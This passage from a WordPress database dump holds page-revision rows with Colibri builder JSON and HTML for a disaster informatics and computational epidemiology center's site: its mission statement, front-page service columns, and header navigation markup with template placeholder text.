align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c39-outer\">\n <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n or health services</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:14:58','2022-02-16 18:14:58','',122,'https://gsudice.dataconn.net/?p=368',0,'revision','',0),(374,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Computational modeling & spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',168,'https://gsudice.dataconn.net/?p=374',0,'revision','',0),(375,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computational modeling & spatially explicit Approaches to better understand how diseases and disasters affect places at local, regional, national, and global scales</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Data reconciliation, consolidation, and distribution to support research in disaster informatics, disease modeling, and spatial epidemiology</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',20,'https://gsudice.dataconn.net/?p=375',0,'revision','',0),(376,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 18:19:53','2022-02-16 18:19:53','',23,'https://gsudice.dataconn.net/?p=376',0,'revision','',0),(377,1,'2022-02-16 18:19:53','2022-02-16 18:19:53','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center 